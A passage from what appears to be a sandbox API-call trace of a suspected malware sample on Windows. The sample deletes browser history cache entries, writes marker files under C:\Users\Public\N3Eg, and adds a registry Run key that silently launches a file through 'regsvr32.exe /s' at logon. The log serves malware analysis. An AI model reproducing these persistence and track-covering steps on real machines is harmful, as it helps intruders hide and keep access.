| out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.008] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://localhost") returned 1 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.008] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173e8f&referer=http://www.oracle.com/splash/java/fw_error.html") returned 1 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.009] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.bing.com/search?format=rss&q=java+jre&qs=n&form=QBRE&pq=java+jre&sc=8-5&sp=-1&sk=&cvid=ADBD7C03E6AD480ABA62FB3F604427FD") returned 1 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.009] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress.html") returned 1 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.009] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://localhost/favicon.ico") returned 1 [0040.009] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.010] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.bing.com/search?format=rss&q=java&FORM=IE8SRC") returned 1 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.010] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/welcome.html") returned 1 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.010] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173ead&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.010] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.010] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173e9d&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.011] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/complete.html") returned 1 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.011] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@file:///C:/xampp/htdocs/index.html") returned 1 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.011] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173e92&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0040.011] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.012] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x718f8f0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x718f8f0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.012] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@--mmc:pagebreak.1") returned 1 [0040.012] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.012] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.012] FindCloseUrlCache (hEnumHandle=0x1) returned 1 [0040.012] GetComputerNameW (in: lpBuffer=0x71dfd14, nSize=0x68ff634 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff634) returned 1 [0040.012] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs")) returned 0 [0040.012] GetLastError () returned 0x2 [0040.012] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 0xffffffff [0040.012] SetLastError (dwErrCode=0x2) [0040.012] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0040.012] GetComputerNameW (in: lpBuffer=0x71dfd14, nSize=0x68ff5d4 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5d4) returned 1 [0040.013] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\wVs" (normalized: "c:\\users\\public\\n3eg\\wvs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb6c [0040.013] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0040.013] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0040.013] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x71d8318, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="50\r\n\x10\x80\x1d\x07DýÍ\x06", lpUsedDefaultChar=0x0) returned 4 [0040.013] WriteFile (in: hFile=0xb6c, lpBuffer=0x71d8318*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x68ff58c, lpOverlapped=0x0 | out: lpBuffer=0x71d8318*, lpNumberOfBytesWritten=0x68ff58c, lpOverlapped=0x0) returned 1 [0040.014] CloseHandle (hObject=0xb6c) returned 1 [0040.016] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\idx") returned 0xffffffff [0040.016] GetLastError () returned 0x2 [0040.016] GetComputerNameW (in: lpBuffer=0x71dfdb4, nSize=0x68ff630 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff630) returned 1 [0040.016] GetComputerNameW (in: lpBuffer=0x71dfdb4, nSize=0x68ff608 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff608) returned 1 [0040.016] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0040.016] GetComputerNameW (in: lpBuffer=0x71dfddc, nSize=0x68ff5a8 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5a8) returned 1 [0040.016] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\idw") returned 0x20 [0040.016] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0040.016] GetComputerNameW (in: lpBuffer=0x71dfdb4, nSize=0x68ff5a8 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5a8) returned 1 [0040.016] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\idw" (normalized: "c:\\users\\public\\n3eg\\idw"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb6c [0040.016] SetFilePointer (in: hFile=0xb6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff55c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x68ff55c*=0) returned 0x0 [0040.016] SetFilePointer (in: hFile=0xb6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff55c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x68ff55c*=0) returned 0x2 [0040.017] SetFilePointer (in: hFile=0xb6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff55c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x68ff55c*=0) returned 0x0 [0040.017] SetFilePointer (in: hFile=0xb6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff568*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x68ff568*=0) returned 0x0 [0040.017] ReadFile (in: hFile=0xb6c, lpBuffer=0x71d8318, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x68ff56c, lpOverlapped=0x0 | out: lpBuffer=0x71d8318*, lpNumberOfBytesRead=0x68ff56c*=0x2, lpOverlapped=0x0) returned 1 [0040.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d8318, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0040.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d8318, cbMultiByte=2, lpWideCharStr=0x71d8478, cchWideChar=2 | out: lpWideCharStr="96蒡ܝ") returned 2 [0040.018] CloseHandle (hObject=0xb6c) returned 1 [0040.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x68ff60c | out: phkResult=0x68ff60c*=0xb6c) returned 0x0 [0040.018] RegSetValueExW (in: hKey=0xb6c, lpValueName="xacwe", Reserved=0x0, dwType=0x1, lpData="regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96", cbData=0x6e | out: lpData="regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96") returned 0x0 [0040.018] RegCloseKey (hKey=0xb6c) returned 0x0 [0040.018] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\idx") returned 0xffffffff [0040.018] GetLastError () returned 0x2 [0040.018] KillTimer (hWnd=0x30154, uIDEvent=0x1) returned 0 [0040.018] SetTimer (hWnd=0x30154, nIDEvent=0x1, uElapse=0x4e20, lpTimerFunc=0x0) returned 0x1 [0040.019] GetLocalTime (in: lpSystemTime=0x68ff638 | out: lpSystemTime=0x68ff638*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x2, wMilliseconds=0x2bd)) [0040.019] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0040.019] GetComputerNameW (in: lpBuffer=0x71dfe54, nSize=0x68ff5d4 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5d4) returned 1 [0040.019] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\idx" (normalized: "c:\\users\\public\\n3eg\\idx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb6c [0040.019] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="100742AM\r\n", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.019] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="100742AM\r\n", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.019] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="100742AM\r\n", cchWideChar=10, lpMultiByteStr=0x71d1740, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="100742AM\r\n", lpUsedDefaultChar=0x0) returned 10 [0040.019] WriteFile (in: hFile=0xb6c, lpBuffer=0x71d1740*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x68ff58c, lpOverlapped=0x0 | out: lpBuffer=0x71d1740*, lpNumberOfBytesWritten=0x68ff58c, lpOverlapped=0x0) returned 1 [0040.021] CloseHandle (hObject=0xb6c) returned 1 [0040.021] KillTimer (hWnd=0x500fe, uIDEvent=0x1) returned 0 [0040.021] SetTimer (hWnd=0x500fe, nIDEvent=0x1, uElapse=0x11170, lpTimerFunc=0x0) returned 0x1 [0040.022] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\wCnx") returned 0xffffffff [0040.022] GetLastError () returned 0x2 [0040.022] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\logx\\tx0") returned 0xffffffff [0040.022] GetLastError () returned 0x3 [0040.022] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\logx\\mb0") returned 0xffffffff [0040.022] GetLastError () returned 0x3 [0040.022] GetWindowLongW (hWnd=0x70144, nIndex=-20) returned 256 [0040.022] IsIconic (hWnd=0x70144) returned 0 [0040.022] IsWindowVisible (hWnd=0x70144) returned 0 [0040.022] SetWindowLongW (hWnd=0x70144, nIndex=-20, dwNewLong=262400) returned 256 [0040.022] DefWindowProcW (hWnd=0x70144, Msg=0x7c, wParam=0xffffffec, lParam=0x68ff838) returned 0x0 [0040.022] DefWindowProcW (hWnd=0x70144, Msg=0x7d, wParam=0xffffffec, lParam=0x68ff838) returned 0x0 [0040.023] MonitorFromWindow (hwnd=0x10166, dwFlags=0x2) returned 0x10001 [0040.023] IsWindowVisible (hWnd=0x70144) returned 0 [0040.023] SetWindowPos (hWnd=0x70144, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0040.023] DefWindowProcW (hWnd=0x70144, Msg=0x46, wParam=0x0, lParam=0x68ff414) returned 0x0 [0040.024] DefWindowProcW (hWnd=0x70144, Msg=0x47, wParam=0x0, lParam=0x68ff414) returned 0x0 [0040.024] ShowWindow (hWnd=0x10166, nCmdShow=1) returned 0 [0040.024] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x46, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.024] GetCurrentThreadId () returned 0xc04 [0040.025] DefWindowProcW (hWnd=0x70144, Msg=0x46, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.025] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x46, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] DefWindowProcW (hWnd=0x70144, Msg=0x46, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.025] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] GetCurrentThreadId () returned 0xc04 [0040.025] DefWindowProcW (hWnd=0x70144, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] PostMessageW (hWnd=0x70144, Msg=0xb000, wParam=0x0, lParam=0x0) returned 1 [0040.026] DefWindowProcW (hWnd=0x10164, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x10162, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x10160, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x1015e, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x1015c, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x1015a, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x10158, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x20156, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x3014e, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x500fe, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x30154, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x60140, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.026] DefWindowProcW (hWnd=0x4010c, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] DefWindowProcW (hWnd=0x600fc, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] DefWindowProcW (hWnd=0x6013e, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] DefWindowProcW (hWnd=0x30150, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] DefWindowProcW (hWnd=0x40148, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] DefWindowProcW (hWnd=0x30152, Msg=0x1c, wParam=0x1, lParam=0x524) returned 0x0 [0040.027] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetCurrentThreadId () returned 0xc04 [0040.028] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.028] SetFocus (hWnd=0x10166) returned 0x0 [0040.030] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0040.031] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] GetCurrentThreadId () returned 0xc04 [0040.031] SendMessageW (hWnd=0x10166, Msg=0xb000, wParam=0x0, lParam=0x0) returned 0x0 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetFocus () returned 0x10166 [0040.032] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xb029, wParam=0x0, lParam=0x0) returned 0x0 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] GetCurrentThreadId () returned 0xc04 [0040.032] IsIconic (hWnd=0x10166) returned 0 [0040.032] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff0b4 | out: lpRect=0x68ff0b4) returned 1 [0040.032] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.032] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x47, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] GetCurrentThreadId () returned 0xc04 [0040.033] DefWindowProcW (hWnd=0x70144, Msg=0x47, wParam=0x0, lParam=0x68ff448) returned 0x0 [0040.033] IsIconic (hWnd=0x10166) returned 0 [0040.033] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff0b8 | out: lpRect=0x68ff0b8) returned 1 [0040.033] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.033] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x5, wParam=0x0, lParam=0x1100b2) returned 0x0 [0040.033] IsIconic (hWnd=0x10166) returned 0 [0040.034] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff0e8 | out: lpRect=0x68ff0e8) returned 1 [0040.034] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff0e8, fWinIni=0x0 | out: pvParam=0x68ff0e8) returned 1 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] IsIconic (hWnd=0x10166) returned 0 [0040.034] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff0cc | out: lpRect=0x68ff0cc) returned 1 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] IsIconic (hWnd=0x10166) returned 0 [0040.034] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff0cc | out: lpRect=0x68ff0cc) returned 1 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] IsIconic (hWnd=0x10166) returned 0 [0040.034] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.034] IsIconic (hWnd=0x10166) returned 0 [0040.034] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.034] FlatSB_SetScrollProp (param_1=0x10166, index=0x100, newValue=0x0, param_4=0) returned 0 [0040.034] GetSysColor (nIndex=20) returned 0xffffff [0040.034] FlatSB_SetScrollProp 